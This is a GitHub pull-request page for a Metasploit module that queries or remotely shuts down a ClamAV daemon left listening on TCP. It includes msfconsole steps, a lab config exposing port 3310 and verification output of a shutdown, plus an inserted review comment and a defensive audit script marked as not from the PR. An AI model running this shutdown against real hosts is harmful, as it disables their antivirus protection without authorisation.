
Add ClamAV Remote Command Transmitter #6980

Merged
merged 9 commits into from Jun 22, 2016

Conversation

bwatters-r7
Contributor

@bwatters-r7 bwatters-r7 commented Jun 15, 2016

What This Module Does

This module takes advantage of a possible misconfiguration in the ClamAV service on release 0.99.2. If the service is tied to a socket, the ClamAV service listens for commands on all addresses; this module connects to the ClamAV service port and sends the proper commands for VERSION and SHUTDOWN.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use auxiliary/admin/misc/clamav_control
  • set rhost xxx.xxx.xxx.xxx
  • set action VERSION
  • run
  • Verify it returns the correct version
  • set action SHUTDOWN
  • run
  • Verify it shuts down the service
  • set action VERSION
  • run
  • Verify it does not return a version (should time out)

@bwatters-r7
Contributor Author

@wvu-r7 can you add a little bit of a description on how to set up the ClamAV so it is vulnerable?

rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
rescue EOFError
print_error('Successfully shut down ClamAV Service')
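Review bot: the rescue EOFError branch reports success on any unexpected close of the socket, not specifically on a completed shutdown; a peer that rejects the command or drops the connection for another reason would produce the same EOFError. Consider confirming the outcome (for example, a follow-up connection attempt that fails as the SHUTDOWN verification step in the description expects) before printing a success line, and, as already noted, use print_good rather than print_error for the success case.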
Contributor


If shutting down ClamAV is the intention, then I guess it should be print_good()?

Contributor


Derp.

@nixawk
Contributor

nixawk commented Jun 16, 2016

ClamAV Lab Setup

debian / ubuntu

$ sudo apt-get install clamav clamav-daemon
$ sudo freshclam
$ sudo clamd --config-file=/etc/clamav/clamd.conf

If clamd fails to listen on port 3310, please add the following content to /etc/clamav/clamd.conf

# TCP port address.
# Default: no
TCPSocket 3310

# TCP address.
# By default we bind to INADDR_ANY, probably not wise.
# Enable the following to provide some degree of protection
# from the outside world.
# Default: no
TCPAddr 0.0.0.0

# Maximum length the queue of pending connections may grow to.
# Default: 15
MaxConnectionQueueLength 30

# Clamd uses FTP-like protocol to receive data from remote clients.
# If you are using clamav-milter to balance load between remote clamd daemons
# on firewall servers you may need to tune the options below.

# Close the connection when the data size limit is exceeded.
# The value should match your MTA's limit for a maximum attachment size.
# Default: 10M
StreamMaxLength 55M

# Limit port range.
# Default: 1024
#StreamMinPort 30000
# Default: 2048
#StreamMaxPort 32000

# Maximum number of threads running at the same time.
# Default: 10
MaxThreads 50

# Waiting for data from a client socket will timeout after this time (seconds).
# Value of 0 disables the timeout.
# Default: 120
ReadTimeout 300

# Waiting for a new job will timeout after this time (seconds).
# Default: 30
#IdleTimeout 60

# Maximum depth directories are scanned at.
# Default: 15
#MaxDirectoryRecursion 20
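
The lab config above enables TCPSocket 3310 with TCPAddr 0.0.0.0, which is exactly the exposure the module in this PR probes (clamd's own comment notes that the default is INADDR_ANY). As an added example, not code from this PR or from the Metasploit project, here is a small Ruby audit that reads a clamd.conf excerpt, classifies whether the TCP listener is reachable from other hosts, and parses a VERSION reply in the format seen in the verification output further down. The two sample configs are constructed for the example; only Ruby's standard-library IPAddr is used.

```ruby
# Added example (not part of the Metasploit PR): audit clamd.conf TCP exposure
# and parse a clamd VERSION reply. Sample configs below are constructed.
require 'ipaddr'

# Parse clamd.conf-style "Directive value" lines, skipping comments and blanks.
# Returns a Hash of directive => value; a repeated directive keeps the last value.
def parse_clamd_conf(text)
  settings = {}
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('#')
    key, value = line.split(/\s+/, 2)
    settings[key] = value
  end
  settings
end

# Classify the TCP exposure of a parsed config:
#   :no_tcp   - no TCPSocket directive, clamd listens on its local socket only
#   :loopback - TCP enabled but bound to a loopback address
#   :exposed  - TCP enabled and bound to a wildcard or routable address
# A missing TCPAddr counts as exposed, since clamd then binds INADDR_ANY.
def tcp_exposure(settings)
  return :no_tcp unless settings.key?('TCPSocket')
  addr = settings['TCPAddr']
  return :exposed if addr.nil?
  return :loopback if addr.casecmp?('localhost')
  begin
    IPAddr.new(addr).loopback? ? :loopback : :exposed
  rescue IPAddr::InvalidAddressError
    :exposed # unparsable bind address: flag it rather than guess
  end
end

# Parse a clamd VERSION reply such as
#   "ClamAV 0.98.7/21772/Wed Jun 22 12:54:15 2016"
# (engine version / signature DB version / signature DB date).
# Returns nil when the text is not a clamd version line.
def parse_version_reply(reply)
  m = reply.strip.match(%r{\AClamAV ([^/\s]+)/(\d+)/(.+)\z})
  return nil unless m
  { engine: m[1], sigdb: m[2].to_i, sigdate: m[3] }
end

# Constructed sample mirroring the lab config in this thread.
EXPOSED_CONF = <<~CONF
  LocalSocket /var/run/clamav/clamd.ctl
  TCPSocket 3310
  TCPAddr 0.0.0.0
  MaxThreads 50
CONF

# Constructed sample with the TCP listener restricted to loopback.
HARDENED_CONF = <<~CONF
  LocalSocket /var/run/clamav/clamd.ctl
  TCPSocket 3310
  TCPAddr 127.0.0.1
CONF

# Summarise one config: port, bind address and exposure classification.
def audit(text)
  settings = parse_clamd_conf(text)
  { port: settings['TCPSocket'], addr: settings['TCPAddr'],
    exposure: tcp_exposure(settings) }
end

if __FILE__ == $PROGRAM_NAME
  [EXPOSED_CONF, HARDENED_CONF].each do |conf|
    r = audit(conf)
    puts "TCPSocket=#{r[:port].inspect} TCPAddr=#{r[:addr].inspect} -> #{r[:exposure]}"
  end
  p parse_version_reply('ClamAV 0.98.7/21772/Wed Jun 22 12:54:15 2016')
end
```

Running it on the first sample reports :exposed and on the second :loopback; the VERSION parser turns the reply shown in the verification output into engine 0.98.7, signature database 21772 and its build date, which is what a defender would record when inventorying clamd instances.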

@bwatters-r7
Contributor Author

Thanks, @wchen-r7, @join-us; great points!
I added the suggested user documentation and changed that print statement.
Then, I realized I screwed up my tests...... so....... fixed that, too.
Please let me know if you notice anything else.

require 'msf/core'

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
Contributor


It would be great to see this utilize Msf::Auxiliary::Scanner so you can more easily run this against larger swaths of targets without additional work.

@bwatters-r7
Contributor Author

@jhart-r7 Thanks for the suggestion to make it a scanner! New version is now a scanner.

@wchen-r7
Contributor

@join-us I'm trying to set up the box on Ubuntu, but I'm getting this:

$ sudo clamd --config-file=/etc/clamav/clamd.conf
ERROR: initgroups() failed

Any suggestions?

@wchen-r7
Contributor

@join-us Never mind. I did this instead:

sudo /etc/init.d/clamav-daemon start

@wchen-r7 wchen-r7 self-assigned this Jun 22, 2016
@wchen-r7
Contributor

Verified:

msf auxiliary(clamav_control) > run

[+] 192.168.1.203:3310    - ClamAV 0.98.7/21772/Wed Jun 22 12:54:15 2016

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(clamav_control) > 
...
msf auxiliary(clamav_control) > run

[+] 192.168.1.203:3310    - Successfully shut down ClamAV Service
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(clamav_control) > set action VERSION
action => VERSION
msf auxiliary(clamav_control) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(clamav_control) >

@wchen-r7 wchen-r7 merged commit c02a05f into rapid7:master Jun 22, 2016
wchen-r7 added a commit that referenced this pull request Jun 22, 2016
@wvu
Contributor

wvu commented Jun 22, 2016

Congrats on your first module, @bwatters-r7!! History has been made!

@wchen-r7 wchen-r7 added this to the v4.12.0-2016062701 milestone Jun 29, 2016
@bwatters-r7 bwatters-r7 deleted the feature/clamav branch January 29, 2019 19:43